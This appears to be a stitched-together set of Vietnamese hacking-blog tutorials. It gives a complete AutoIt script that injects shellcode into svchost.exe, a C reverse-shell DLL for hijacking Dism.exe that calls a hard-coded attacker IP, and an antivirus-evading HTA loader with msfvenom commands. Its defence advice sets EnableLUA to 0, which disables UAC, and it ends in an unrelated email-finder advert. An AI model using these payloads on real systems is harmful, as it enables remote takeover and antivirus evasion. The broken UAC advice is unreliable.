            ReDim $matchingProcesses[UBound($matchingProcesses) + 1]
            $matchingProcesses[UBound($matchingProcesses) - 1] = $processPID
        EndIf
    Next

    If UBound($matchingProcesses) > 1 Then
        $randomIndex = Random(1, UBound($matchingProcesses) - 1, 1)
        $randomPID = $matchingProcesses[$randomIndex]
        Return $randomPID
    Else
        Return ""
    EndIf
EndFunc

Hàm này tìm tất cả các tiến trình có tên chứa $process (ở đây là “svchost.exe”) và chọn ngẫu nhiên một PID thuộc về người dùng hiện tại. Chi tiết:

• $loggedInUser = @UserName: Lấy tên người dùng hiện tại (ví dụ: “Admin”).
• $processList = ProcessList(): Lấy danh sách tất cả tiến trình đang chạy trên máy
• Dim $matchingProcesses[1]: Tạo một mảng để lưu các PID phù hợp
• Vòng lặp For:

– Duyệt qua từng tiến trình trong $processList

– StringInStr($processName, $process): Kiểm tra xem tên tiến trình có chứa “svchost.exe” không

– _IsProcessOwner($processPID, $loggedInUser): Kiểm tra xem tiến trình thuộc về người dùng hiện tại không

– Nếu cả hai điều kiện đúng, thêm PID vào mảng $matchingProcesses

Kết quả: 

• Nếu có nhiều hơn 1 tiến trình khớp, chọn ngẫu nhiên một PID bằng Random() và trả về
• Nếu không tìm thấy, trả về chuỗi rỗng

Hàm _IsProcessOwner()

Func _IsProcessOwner($processPID, $username)
    Local $aWMI = ObjGet("winmgmts:\\.\root\cimv2")
    Local $colItems = $aWMI.ExecQuery("Select * from Win32_Process where ProcessID=" & $processPID)

    For $objItem In $colItems
        If $objItem.GetOwner() = $username Then
            Return 1
        EndIf
    Next
    Return 0
EndFunc

Hàm này kiểm tra xem tiến trình với PID cụ thể có thuộc về người dùng hiện tại ($username) không. Chi tiết:

• $aWMI = ObjGet(“winmgmts:\\.\root\cimv2”): Kết nối đến WMI (Windows Management Instrumentation) để truy vấn thông tin hệ thống
• $colItems = $aWMI.ExecQuery(…): Truy vấn thông tin về tiến trình có PID là $processPID
• Vòng lặp: Kiểm tra chủ sở hữu (GetOwner) của tiến trình. Nếu khớp với $username, trả về 1 (đúng); nếu không, trả về 0 (sai)

Để dễ hiểu hơn thì phần này giống như kiểm tra xem số điện thoại trong danh bạ có phải của bạn không, để tránh gọi nhầm người khác

Hàm _ptr()

Func _ptr($s, $e = "")
    If $e <> "" Then Return DllStructGetPtr($s, $e)
    Return DllStructGetPtr($s)
EndFunc

Hàm này lấy “con trỏ” (địa chỉ trong bộ nhớ) của một cấu trúc dữ liệu (DllStruct) Chi tiết:

• $s: Cấu trúc cần lấy con trỏ
• $e: Phần tử cụ thể trong cấu trúc (nếu có, nhưng ở đây không dùng)
• DllStructGetPtr: Trả về địa chỉ bộ nhớ của cấu trúc

Hàm sizeof()

Func sizeof($s)
    Return DllStructGetSize($s)
EndFunc

• Ý nghĩa: Hàm này trả về kích thước (số byte) của một cấu trúc dữ liệu
• Chi tiết: DllStructGetSize tính kích thước dựa trên định nghĩa của cấu trúc

Hàm _ProcessInjection()

Func _ProcessInjection()
    Local $autoItshellcode = "0x" & $hexShellcode
    Local $shellcodeBuffer = DllStructCreate("byte[" & BinaryLen($autoItshellcode) & "]")
    DllStructSetData($shellcodeBuffer, 1, $autoItshellcode)
    ConsoleWrite("[+] Shellcode size: " & sizeof($shellcodeBuffer) & " bytes" & @CRLF & @CRLF)
    ConsoleWrite("[+] Injecting shellcode into PID:" & $targetPID & " (" & $targetProcName &")" & @CRLF & @CRLF)

    $hProcess = _WinAPI_OpenProcess( _
        $PROCESS_ALL_ACCESS, _
        0, _
        $targetPID, _
        True)

    $hRegion = _MemVirtualAllocEx( _
        $hProcess, _
        0, _
        sizeof($shellcodeBuffer), _
        $MEM_COMMIT + $MEM_RESERVE, _
        $PAGE_READWRITE)

    Local $written

    _WinAPI_WriteProcessMemory ( _
        $hProcess, _
        $hRegion, _
        _ptr($shellcodeBuffer), _
        sizeof($shellcodeBuffer), _
        $written)

    $protectCall = DllCall("kernel32.dll", "int", "VirtualProtectEx", _
        "hwnd", $hProcess, _
        "ptr", $hRegion, _
        "ulong_ptr", sizeof($shellcodeBuffer), _
        "uint", 0x20, _
        "uint*", 0)

    $hProtect = $protectCall[0]

    $threadCall = DllCall("Kernel32.dll", "int", "CreateRemoteThread", _
        "ptr", $hProcess, _
        "ptr", 0, _
        "int", 0, _
        "ptr", $hRegion, _
        "ptr", 0, _
        "int", 0, _
        "dword*", 0)

    $hThread = $threadCall[0]
EndFunc

Hàm _ProcessInjection() là hàm giúp đưa mã độc vào tiến trình đích (ở đây là svchost.exe) và chạy nó một cách lén lút, biến tiến trình hợp pháp thành mã độc thực thi. Chi tiết:

Local $autoItshellcode = "0x" & $hexShellcode
Local $shellcodeBuffer = DllStructCreate("byte[" & BinaryLen($autoItshellcode) & "]")
DllStructSetData($shellcodeBuffer, 1, $autoItshellcode)
ConsoleWrite("[+] Shellcode size: " & sizeof($shellcodeBuffer) & " bytes" & @CRLF & @CRLF)
ConsoleWrite("[+] Injecting shellcode into PID:" & $targetPID & " (" & $targetProcName &")" & @CRLF & @CRLF)

• Shellcode là đoạn mã độc mà chúng ta muốn tiêm vào. Ở đây, $hexShellcode là một chuỗi mã hóa dạng hexa (ví dụ: “fc4883e4f”), và mình thêm “0x” để biến nó thành định dạng mà AutoIt hiểu được
• Tạo bộ đệm: DllStructCreate tạo một “hộp chứa” (buffer) để lưu shellcode. Kích thước của hộp này bằng độ dài của shellcode (BinaryLen)
• Đưa shellcode vào hộp: DllStructSetData đặt shellcode vào hộp vừa tạo
• Thông báo: Hai lệnh ConsoleWrite hiển thị thông tin kích thước shellcode và tiến trình đích (PID và tên) để người dùng biết điều gì đang xảy ra

$hProcess = _WinAPI_OpenProcess( _
$PROCESS_ALL_ACCESS, _
0, _
$targetPID, _
True)

• Hàm _WinAPI_OpenProcess giống như xin phép hệ điều hành để “mở cửa” tiến trình đích (ở đây là svchost.exe, có mã số $targetPID đã được tìm trước đó)
• Quyền hạn: $PROCESS_ALL_ACCESS yêu cầu toàn quyền truy cập (đọc, ghi, thực thi) vào tiến trình này
• Kết quả: $hProcess là “chìa khóa” để ta thao tác với tiến trình đó. Để dễ hiểu hơn giống như bạn cần chìa khóa để vào nhà người khác thì $hProcess chính là chìa khóa mở cửa svchost.exe

$hRegion = _MemVirtualAllocEx( _
    $hProcess, _
    0, _
    sizeof($shellcodeBuffer), _
    $MEM_COMMIT + $MEM_RESERVE, _
    $PAGE_READWRITE)

• Hàm _MemVirtualAllocEx tạo một “khoảng trống” trong bộ nhớ của tiến trình đích để lưu shellcode. Kích thước khoảng trống này bằng kích thước của shellcode (sizeof($shellcodeBuffer))
• Quyền truy cập: $PAGE_READWRITE cho phép đọc và ghi vào khoảng trống này. $MEM_COMMIT + $MEM_RESERVE đảm bảo khoảng trống được sử dụng ngay và dành sẵn
• Kết quả: $hRegion là địa chỉ của khoảng trống vừa tạo

Local $written
_WinAPI_WriteProcessMemory ( _
$hProcess, _
$hRegion, _
_ptr($shellcodeBuffer), _
sizeof($shellcodeBuffer), _
$written)

Hàm _WinAPI_WriteProcessMemory sao chép shellcode từ “hộp chứa” ($shellcodeBuffer) vào khoảng trống ($hRegion) trong tiến trình svchost.exe

Tham số: 

• $hProcess: Chìa khóa để vào tiến trình scvhost.exe
• $hRegion: Địa chỉ phòng trống
•  _ptr($shellcodeBuffer): Con trỏ đến shellcode trong hộp chứa
• sizeof($shellcodeBuffer): Kích thước dữ liệu cần sao chép
• $written: Biến lưu số byte đã ghi (dùng để kiểm tra)

$protectCall = DllCall("kernel32.dll", "int", "VirtualProtectEx", _
    "hwnd", $hProcess, _
    "ptr", $hRegion, _
    "ulong_ptr", sizeof($shellcodeBuffer), _
    "uint", 0x20, _
    "uint*", 0)
$hProtect = $protectCall[0]

• VirtualProtectEx thay đổi quyền truy cập của “phòng trống” từ chỉ đọc/ghi (PAGE_READWRITE) sang có thể thực thi (0x20 là PAGE_EXECUTE_READ).
• Tại sao cần: Shellcode là mã cần chạy, nên vùng bộ nhớ chứa nó phải được phép “thực thi”
• Kết quả: $hProtect cho biết việc thay đổi quyền có thành công hay không

$threadCall = DllCall("Kernel32.dll", "int", "CreateRemoteThread", _
    "ptr", $hProcess, _
    "ptr", 0, _
    "int", 0, _
    "ptr", $hRegion, _
    "ptr", 0, _
    "int", 0, _
    "dword*", 0)
$hThread = $threadCall[0]

CreateRemoteThread tạo một thread trong tiến trình svchost.exe để chạy shellcode tại địa chỉ $hRegion

Tham số: 

• $hProcess: Chìa khóa vào tiến trình
• $hRegion: Địa chỉ shellcode để chạy
• Các tham số khác để mặc định (0)

Kết quả: $hThread là mã định danh của thread vừa tạo

Đây là đoạn code hoàn chỉnh:

#include <Process.au3>
#include <Memory.au3>
#include <WinAPI.au3>
#include <Array.au3>

Global $hexShellcode = "fc4883e4f"

_CheckProcess()
_ProcessInjection()

Func _CheckProcess()
    ConsoleWrite("[+] Checking for target process" & @CRLF & @CRLF)

    Global $targetPID = Find_Process("svchost.exe")

    If Not $targetPID = 0 Then
        Global $targetProcName = _ProcessGetName($targetPID)
        ConsoleWrite("[+] Target process is running (" & $targetProcName &")" & @CRLF & @CRLF)

    ElseIf $targetPID = 0 Then
        ConsoleWrite("[!] Target process is not running. Exiting." & @CRLF & @CRLF)
        Exit
    EndIf

EndFunc

Func Find_Process($process)
    $loggedInUser = @UserName
    $processList = ProcessList()
    Dim $matchingProcesses[1]

    For $i = 1 To $processList[0][0]
        $processName = $processList[$i][0]
        $processPID = $processList[$i][1]

        If StringInStr($processName, $process) And _IsProcessOwner($processPID, $loggedInUser) Then
            ReDim $matchingProcesses[UBound($matchingProcesses) + 1]
            $matchingProcesses[UBound($matchingProcesses) - 1] = $processPID
        EndIf
    Next

    If UBound($matchingProcesses) > 1 Then
        $randomIndex = Random(1, UBound($matchingProcesses) - 1, 1)
        $randomPID = $matchingProcesses[$randomIndex]
        Return $randomPID
    Else
        Return ""
    EndIf
EndFunc

Func _ProcessInjection()
    Local $autoItshellcode = "0x" & $hexShellcode
    Local $shellcodeBuffer = DllStructCreate("byte[" & BinaryLen($autoItshellcode) & "]")
    DllStructSetData($shellcodeBuffer, 1, $autoItshellcode)
    ConsoleWrite("[+] Shellcode size: " & sizeof($shellcodeBuffer) & " bytes" & @CRLF & @CRLF)
    ConsoleWrite("[+] Injecting shellcode into PID:" & $targetPID & " (" & $targetProcName &")" & @CRLF & @CRLF)

    $hProcess = _WinAPI_OpenProcess( _
        $PROCESS_ALL_ACCESS, _
        0, _
        $targetPID, _
        True)

    $hRegion = _MemVirtualAllocEx( _
        $hProcess, _
        0, _
        sizeof($shellcodeBuffer), _
        $MEM_COMMIT + $MEM_RESERVE, _
        $PAGE_READWRITE)

    Local $written

    _WinAPI_WriteProcessMemory ( _
        $hProcess, _
        $hRegion, _
        _ptr($shellcodeBuffer), _
        sizeof($shellcodeBuffer), _
        $written)

    $protectCall = DllCall("kernel32.dll", "int", "VirtualProtectEx", _
        "hwnd", $hProcess, _
        "ptr", $hRegion, _
        "ulong_ptr", sizeof($shellcodeBuffer), _
        "uint", 0x20, _
        "uint*", 0)

    $hProtect = $protectCall[0]

    $threadCall = DllCall("Kernel32.dll", "int", "CreateRemoteThread", _
        "ptr", $hProcess, _
        "ptr", 0, _
        "int", 0, _
        "ptr", $hRegion, _
        "ptr", 0, _
        "int", 0, _
        "dword*", 0)

    $hThread = $threadCall[0]

EndFunc

Func _ptr($s, $e = "")
    If $e <> "" Then Return DllStructGetPtr($s, $e)
    Return DllStructGetPtr($s)
EndFunc

Func sizeof($s)
    Return DllStructGetSize($s)
EndFunc

Func _IsProcessOwner($processPID, $username)
    Local $aWMI = ObjGet("winmgmts:\\.\root\cimv2")
    Local $colItems = $aWMI.ExecQuery("Select * from Win32_Process where ProcessID=" & $processPID)

    For $objItem In $colItems
        If $objItem.GetOwner() = $username Then
            Return 1
        EndIf
    Next
    Return 0
EndFunc

Tổng kết cách hoạt động của toàn bộ code

1. _CheckProcess() và Find_Process(): Tìm và kiểm tra xem svchost.exe có chạy không, chọn ngẫu nhiên một PID phù hợp.

2. _ProcessInjection(): Tiêm shellcode vào tiến trình đích qua 6 bước (chuẩn bị, mở tiến trình, cấp phát bộ nhớ, ghi shellcode, cấp quyền thực thi, chạy shellcode)

3. Các hàm hỗ trợ (_ptr, sizeof, _IsProcessOwner): Giúp xử lý chi tiết như lấy địa chỉ, kích thước, và xác minh quyền sở hữu

Kết quả: Shellcode sẽ chạy trong svchost.exe. Tuy nhiên, với $hexShellcode = “fc4883e4f”, đây chỉ là đoạn mã mẫu, nên bạn cần shellcode đầy đủ (ví dụ từ Metasploit)

Và đây là kết quả:

Được rồi, bây giờ mình sẽ tạo một payload reverse shell https từ Metasploit, sau đó thử xem Antivirus có phát hiện ra hay không nhé. Mời các bạn xem demo:

Qua bài viết này, chúng ta đã cùng khám phá cách sử dụng AutoIt để thực hiện kỹ thuật Shellcode Injection. Hiểu biết về nó không chỉ giúp bạn nắm rõ cách hacker xâm nhập, mà còn là nền tảng để xây dựng các biện pháp phòng thủ hiệu quả hơn. Mình mong rằng bạn thực hiện kĩ thuật này chỉ để thử nghiệm trong môi trường an toàn và sử dụng kiến thức này một cách có trách nhiệm để bảo vệ hệ thống, thay vì gây hại. Chúc bạn thành công trên hành trình khám phá thế giới an ninh mạng !

Câu hỏi thường gặp

Shellcode Injection là gì và tại sao nó nguy hiểm?

Shellcode Injection là kỹ thuật chèn mã độc hại (shellcode) vào bộ nhớ của một tiến trình đang chạy để thực thi các lệnh độc hại. Nó nguy hiểm vì cho phép kẻ tấn công thực hiện các hành vi bất hợp pháp trên hệ thống bị xâm phạm mà không cần quyền truy cập trực tiếp.

AutoIt đóng vai trò gì trong Shellcode Injection?

AutoIt là một ngôn ngữ lập trình dễ sử dụng, cung cấp các hàm giúp tương tác với hệ điều hành Windows, bao gồm cả việc thao tác bộ nhớ. Điều này làm cho việc thực hiện Shellcode Injection trở nên dễ dàng hơn và nguy hiểm hơn.

Bài viết này có an toàn để sử dụng không?

Bài viết này chỉ mang tính chất giáo dục và nghiên cứu. Việc sử dụng các kỹ thuật được mô tả trong bài viết cho mục đích bất hợp pháp là hoàn toàn trái pháp luật và tác giả không chịu trách nhiệm về bất kỳ hậu quả nào.

Lưu ý quan trọng: Bài viết này chỉ phục vụ mục đích học tập và nghiên cứu. AnonyViet không khuyến khích bất kỳ hành vi bất hợp pháp nào, và bạn cần chịu trách nhiệm cho hành động của mình!

DLL Hijacking là gì?

DLL Hijacking là một kỹ thuật khai thác lỗ hổng khi chương trình không kiểm soát chặt chẽ cách tải tệp DLL. Khi một ứng dụng như Dism.exe (công cụ quản lý hệ thống của Windows) chạy, nó sẽ tìm kiếm DLL cần thiết trong một loạt thư mục theo thứ tự ưu tiên.

Nếu hacker đặt một DLL giả mạo vào thư mục mà chương trình kiểm tra trước khi đến thư mục chính thống (như System32), ứng dụng sẽ “ngây thơ” tải mã độc thay vì DLL gốc. Đây chính là “khe hở” mà các chuyên gia bảo mật – hoặc hacker – có thể tận dụng.

Tại sao Dism.exe là mục tiêu lý tưởng?

Dism.exe là một công cụ tích hợp sẵn trong Windows, thường nằm ở thư mục C:\Windows\System32. Vì tính phổ biến và vai trò quan trọng của nó trong việc quản lý hệ thống, Dism.exe trở thành “con mồi” hấp dẫn để thử nghiệm DLL Hijacking. Hơn nữa, cách Windows tìm kiếm DLL đôi khi thiếu chặt chẽ, mở ra cơ hội cho các cuộc tấn công tinh vi.

Hướng dẫn khai thác DLL Hijacking với Process Monitor

Để khai thác lỗ hổng này, chúng ta cần công cụ Process Monitor từ Sysinternals. Đây là “trợ thủ đắc lực” giúp bạn theo dõi cách hệ thống tương tác với các tệp DLL. Dưới đây là các bước chi tiết:

Bước 1: Chuẩn bị môi trường thử nghiệm

• Vào trang chính thức của Sysinternals để tải Process Monitor. Chỉ cần giải nén và chạy file Procmon.exe.

• Để an toàn, hãy sử dụng VirtualBox hoặc VMware thay vì thử trực tiếp trên máy chính.
• Chọn mục tiêu: Ở đây, mình chọn Dism.exe, nhưng bạn có thể áp dụng cách này cho bất kỳ chương trình nào.

Bước 2: Theo dõi hành vi của Dism.exe

Mở Process Monitor, bạn sẽ thấy hàng loạt sự kiện hệ thống được ghi lại. Đừng hoảng! Hãy thiết lập bộ lọc để tập trung:

• Nhấn Ctrl + L (hoặc vào Filter > Filter).
• Thêm điều kiện: Process Name – is – dism.exe – Include và Path – contains
  – .dll – Include

• Nhấn Add rồi OK. Giờ Process Monitor chỉ hiển thị hoạt động liên quan đến Dism.exe và DLL.

Bước 3: Chạy Dism.exe và quan sát

• Mở PowerShell, gõ C:\Windows\System32\dism.exe và nhấn Enter.
• Quay lại Process Monitor, bạn sẽ thấy danh sách các DLL mà Dism.exe cố gắng tải.

• Nếu cột Result hiển thị “NAME NOT FOUND” thì đó là dấu hiệu chương trình có thể bị khai thác DLL Hijacking.

Ví dụ, mình phát hiện tệp C:\Windows\System32\DismCore.dll có thể bị khai thác.

Bước 4: Tạo DLL giả mạo

• Sao chép Dism.exe vào thư mục %Temp%.

• Tạo một file DismCore.dll độc hại. Ở đây mình đã tạo ra một payload reverse shell có tên là DismCore.cpp rồi biên dịch thành file DismCore.dll bằng Visual Studio sau đó copy vào thư mục %Temp% và chạy lại file Dism.exe

#define REVERSEIP "193.161.193.99" #địa chỉ ip máy hacker
#define REVERSEPORT 52543 #port máy hacker

#include <winsock2.h>
#include <stdio.h>

#pragma comment(lib,"ws2_32")

WSADATA wsaData;
SOCKET Winsock;
SOCKET Sock;
struct sockaddr_in hax;

STARTUPINFO ini_processo;
PROCESS_INFORMATION processo_info;

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
WSAStartup(MAKEWORD(2,2), &wsaData);
Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);

hax.sin_family = AF_INET;
hax.sin_port = htons(REVERSEPORT);
hax.sin_addr.s_addr = inet_addr(REVERSEIP);

WSAConnect(Winsock,(SOCKADDR*)&hax,sizeof(hax),NULL,NULL,NULL,NULL);

memset(&ini_processo,0,sizeof(ini_processo));
ini_processo.cb=sizeof(ini_processo);
ini_processo.dwFlags=STARTF_USESTDHANDLES;
ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock;

CreateProcess(NULL,"cmd.exe",NULL,NULL,TRUE,0,NULL,NULL,&ini_processo,&processo_info);
return TRUE;
}

Bước 5: Kiểm tra kết quả

Chạy Dism.exe từ %Temp%. Nếu thành công, một kết nối reverse shell sẽ được gửi đến IP và port bạn đã định nghĩa. Hacker giờ có thể điều khiển máy từ xa!

Cách phát hiện và phòng chống DLL Hijacking

Hiểu cách khai thác là một chuyện, nhưng bảo vệ hệ thống khỏi DLL Hijacking lại là một thử thách khác. Dưới đây là cách nhận diện và ngăn chặn:

Cách phát hiện DLL Hijacking

1. Khám phá bằng Process Monitor

Đây là công cụ hữu hiệu để theo dõi quá trình chương trình tải DLL: Quan sát hoạt động của ứng dụng và tìm kiếm dòng “NAME NOT FOUND” trong cột kết quả, khi nó cố lấy DLL từ những vị trí không bảo mật (chẳng hạn thư mục đang dùng hoặc ngoài System32).

Nếu ứng dụng tìm kiếm DLL ở các nơi dễ bị kẻ xấu chèn tệp giả trước khi đến thư mục chuẩn, đó là dấu hiệu tiềm ẩn nguy cơ.

2. Tận dụng DLLSpy

DLLSpy là giải pháp gọn nhẹ, chuyên biệt để phát hiện nguy cơ DLL Hijacking:

Cách thực hiện:

1. Khởi động DLLSpy trên máy tính.
2. Công cụ sẽ rà soát các tiến trình đang chạy, kiểm tra cách chúng tìm kiếm DLL.
3. DLLSpy đưa ra danh sách những ứng dụng có thể bị tấn công nếu chúng ưu tiên tìm DLL từ các thư mục không đáng tin (như thư mục cá nhân hoặc đường dẫn bất thường).

Điểm mạnh: DLLSpy tự động hóa việc phân tích, giúp nhanh chóng chỉ ra các phần mềm dễ tổn thương mà không cần thao tác thủ công như với Process Monitor.

Ví dụ: Khi kiểm tra Dism.exe, DLLSpy có thể phát hiện xem nó tìm DismCore.dll ở đâu ngoài System32 hay không.

3. Kiểm tra trình tự tải DLL qua Dependency Walker

Tải về Dependency Walker (miễn phí) để xem xét các DLL mà phần mềm cần dùng.
Khởi chạy ứng dụng trong công cụ này, sau đó quan sát danh sách DLL cùng đường dẫn nạp. Nếu phát hiện DLL được lấy từ nơi không chính thống, đó là tín hiệu cảnh báo.

4. Lưu ý dấu hiệu bất thường

• Khi một phần mềm quen thuộc (như Dism.exe) hoạt động kỳ lạ (hiển thị thông điệp lạ lùng hoặc gặp lỗi), có khả năng DLL đã bị thay thế.
• Sử dụng Task Manager hoặc Process Explorer để kiểm tra các tiến trình liên quan và xác minh nguồn gốc tập tin.

Những biện pháp ngăn ngừa lỗ hổng DLL Hijacking

1. Giới hạn quyền truy cập thư mục

• Đảm bảo chỉ tài khoản quản trị viên mới được phép ghi dữ liệu vào các thư mục quan trọng như C:\Windows\System32.
• Tránh khởi chạy ứng dụng từ những nơi không an toàn (ví dụ: C:\Downloads), vì kẻ tấn công có thể đặt DLL giả mạo tại đó.

2. Áp dụng đường dẫn cố định trong lập trình

Nếu bạn phát triển phần mềm, hãy cấu hình để chương trình gọi DLL bằng đường dẫn rõ ràng (như C:\Windows\System32\DismCore.dll), thay vì để nó tự do tìm kiếm.

3. Bật chế độ SafeDLLSearchMode

Kiểm tra và đặt giá trị SafeDllSearchMode trong Registry (tại HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager) thành 1, để ưu tiên các thư mục hệ thống trước tiên.

4. Triển khai công cụ bảo vệ

Sử dụng phần mềm diệt virus hoặc chống mã độc (như Malwarebytes, Kaspersky,…) để nhận diện và ngăn chặn các DLL nguy hiểm kịp thời.

Kết luận

DLL Hijacking không chỉ là một kỹ thuật tấn công mà còn là lời cảnh báo về tầm quan trọng của bảo mật phần mềm. Với các công cụ như Process Monitor, bạn có thể vừa khai thác vừa phòng chống lỗ hổng này một cách hiệu quả. Thế giới bảo mật còn vô vàn điều thú vị đang chờ bạn khám phá. Hãy bắt đầu từ hôm nay, biến kiến thức thành sức mạnh và luôn cẩn thận trong từng bước đi nhé!

Câu hỏi thường gặp

DLL Hijacking là gì và nó hoạt động như thế nào?

DLL Hijacking là một kỹ thuật tấn công tận dụng việc một chương trình tải DLL từ một vị trí không mong muốn. Hacker đặt một DLL độc hại vào một thư mục mà chương trình tìm kiếm trước khi đến thư mục chính thống, khiến chương trình tải mã độc thay vì DLL hợp lệ.

Tại sao Dism.exe thường được nhắm mục tiêu trong các cuộc tấn công DLL Hijacking?

Dism.exe là một công cụ hệ thống quan trọng, thường được sử dụng và nằm trong thư mục hệ thống. Việc kiểm tra đường dẫn tải DLL của nó đôi khi không đủ chặt chẽ, tạo điều kiện cho việc chèn DLL giả mạo.

Tôi có thể làm gì để bảo vệ hệ thống của mình khỏi bị tấn công DLL Hijacking?

Luôn cập nhật hệ điều hành và phần mềm của bạn lên phiên bản mới nhất, sử dụng phần mềm diệt virus đáng tin cậy và kiểm soát chặt chẽ quyền truy cập vào các thư mục hệ thống.

Lưu ý: Bài viết này chỉ dành cho mục đích nghiên cứu, học tập. Anonyviet sẽ không chịu bất cứ mọi hành vi bất hợp pháp nào !

Khái niệm ngắn gọn về HTA và phương thức tấn công

HTA là gì?

HTA (HTML Application) là một loại ứng dụng dựa trên HTML do Microsoft phát triển, có thể thực thi trực tiếp thông qua mshta.exe mà không bị hạn chế bởi sandbox của trình duyệt. Chính vì thế HTA trở thành một công cụ hữu ích cho các tác vụ tự động hóa hợp pháp, nhưng cũng là một công cụ lợi hại trong tay hacker

Tại sao HTA có thể bị lạm dụng?

• Chạy với quyền cao: HTA có thể thực thi VBScript/JavaScript với quyền của người dùng mà không cần hiển thị cửa sổ cảnh báo như khi chạy script thông thường
• Không cần ghi file: Hacker có thể tải HTA từ xa mà không cần lưu trữ nội dung độc hại trên máy nạn nhân
• Bỏ qua một số giải pháp bảo mật: Một số phần mềm Antivirus không quét HTA kỹ như các file thực thi khác (.exe, .dll), tạo ra cơ hội bypass

Cách thức hoạt động của payload HtaMal

HtaMal là một công cụ tạo ra 1 payload HTA để thực thi shellcode từ xa, giúp tránh bị phát hiện bởi Antivirus. Quy trình tổng quát như sau:

Tạo file HTA chứa mã JavaScript độc hại

• Trong source code của tool mình đã xáo trộn payload ở trang https://obfuscator.io/, bạn có thể xem các source code của payload ở phần cuối trong source tool
• Payload của HtaMal sẽ chuyển tên file, url và lệnh thực thi sang hex và 2 tệp: autoit.exe và loader.a3x được mã hóa bằng thuật toán XOR. Khi payload thực thi trên máy nạn nhân, nó sẽ tự giải mã và thực thi lệnh trong thư mục %appdata%

Tải shellcode từ máy chủ C2: Khi người dùng mở file HTA, script loader.a3x sẽ lấy shellcode từ server của hacker

Lợi dụng chữ ký số (Digital Signature) hợp lệ của file autoit.exe để bypass Antivirus

• Mình đã compile script loader.au3 sang loader.a3x, khi chạy lệnh autoit.exe loader.a3x <hex_url_shellcode> thực hiện tải xuống và thực thi shellcode từ xa, bằng cách sử dụng các hàm Windows API để cấp phát bộ nhớ, sao chép shellcode vào vùng nhớ đã cấp phát, sau đó tạo một luồng mới để thực thi shellcode.
• Một trong những kỹ thuật Bypass Antivirus (AV) phổ biến là lợi dụng chữ ký số hợp lệ của phần mềm hợp pháp để thực thi mã độc. Trong trường hợp này, mình đã lợi dụng AutoIt.exe có chữ ký số hợp lệ để tránh bị phát hiện bởi phần mềm bảo mật

HtaMal – Công cụ tạo payload thực thi Shellcode từ xa Bypass Antivirus

Để sử dụng công cụ này, bạn cần phải tải Python về máy, sau đó tải source code của tool tại đây, sau khi tải xong bạn giải nén ra và trải nghiệm thôi ( Pass giải nén: anonyviet.com )

Trước khi sử dụng HtaMal, chúng ta cần phải tạo ra một shellcode, ở đây mình sẽ sử dụng Metasploit để tạo với câu lệnh:

msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.1.33 lport=8443 -f raw -o shellcode.bin

#Setup môi trường lệnh tấn công

msfconsole

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_https

set lhost=your ip address

set lport=your port

run

Tiếp đến, chạy lệnh python3 -m http.server 80 để mở ra server lưu trữ file shellcode.bin và python3 htamal.py để chạy tool. Bây giờ mình sẽ nhập url chứa shellcode của mình

Như vậy đã xong, bây giờ mình sẽ nén payload hta_payload.hta thành file zip với mật khẩu là 123123@

Và đây là kết quả:

Video demo:

Cách phòng chống tấn công bằng HTA

Do mshta.exe hiếm khi cần thiết trong môi trường doanh nghiệp, chặn mshta.exe là một cách đơn giản để giảm nguy cơ bị tấn công. Có thể thực hiện bằng cách:

Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System" -Name "EnableLUA" -Value 0

Hoặc trong Group Policy:

• Computer Configuration → Windows Settings → Security Settings → Software Restriction Policies
• Thêm mshta.exe vào danh sách bị chặn

HtaMal là một công giúp tạo payload thực thi shellcode từ xa, sử dụng các kỹ thuật bypass Antivirus (AV) để tránh bị phát hiện. Bằng cách kết hợp HTA (HTML Application) với AutoIt, công cụ này có thể thực thi mã độc trực tiếp trong bộ nhớ. Tuy nhiên, điều quan trọng cần nhấn mạnh là HtaMal chỉ được sử dụng cho mục đích nghiên cứu bảo mật và kiểm thử xâm nhập hợp pháp.

Để phòng chống các kỹ thuật bypass AV như HtaMal, cần phải:
🔹 Giám sát tiến trình đáng ngờ, đặc biệt là AutoIt.exe.
🔹 Hạn chế thực thi HTA trên hệ thống nếu không cần thiết.
🔹 Áp dụng các cơ chế bảo vệ nâng cao như Application Whitelisting, AMSI Logging, và Behavioral Analysis.

👉 Bạn nghĩ gì về phương pháp này? Có cách nào cải thiện khả năng phát hiện của AV để chống lại kỹ thuật này không? Hãy chia sẻ ý kiến của bạn! 🚀

Câu hỏi thường gặp

HTA (HTML Application) là gì và tại sao nó lại dễ bị lợi dụng trong tấn công?

HTA là ứng dụng dựa trên HTML, có thể chạy trực tiếp bằng mshta.exe mà không bị hạn chế bởi sandbox trình duyệt. Điều này cho phép nó thực thi VBScript/JavaScript với quyền người dùng, tải mã độc từ xa mà không cần lưu file, và bỏ qua một số cơ chế bảo mật của Antivirus.

HtaMal hoạt động như thế nào để thực thi shellcode từ xa và vượt qua Antivirus?

HtaMal tạo payload HTA chứa mã JavaScript, tải shellcode từ máy chủ C2, và lợi dụng AutoIt.exe (có chữ ký số hợp lệ) để giải mã và thực thi shellcode trong bộ nhớ, qua đó tránh bị phát hiện.

Làm thế nào để phòng chống các cuộc tấn công sử dụng kỹ thuật tương tự như HtaMal?

Chặn mshta.exe, giám sát tiến trình đáng ngờ (như AutoIt.exe), hạn chế thực thi HTA, và áp dụng các cơ chế bảo vệ nâng cao như Application Whitelisting, AMSI Logging, và Behavioral Analysis.

Snov.io Email Finder là gì?

Snov.io Email Finder là một công cụ giúp bạn nhanh chóng tìm và xác minh địa chỉ email, giúp việc kết nối với đúng người trở nên dễ dàng hơn. Dù bạn đang làm công việc tiếp thị bán hàng, tuyển dụng hay đơn giản là muốn mở rộng mạng lưới của mình, công cụ này cho phép bạn tìm kiếm email dựa trên tên người, tên miền của công ty, hoặc thậm chí chỉ cần một hồ sơ LinkedIn.

Tính năng xác thực thông minh của Snov.io Email Finder

Không chỉ tìm kiếm, Snov.io Email Finder còn giúp bạn xác thực địa chỉ email, đảm bảo email bạn gửi đến đúng người nhận và tránh bị trả lại. Điều này giúp:

• Email của bạn không bị rơi vào hộp thư rác, Snov.io giúp bạn loại bỏ những địa chỉ email không tồn tại.
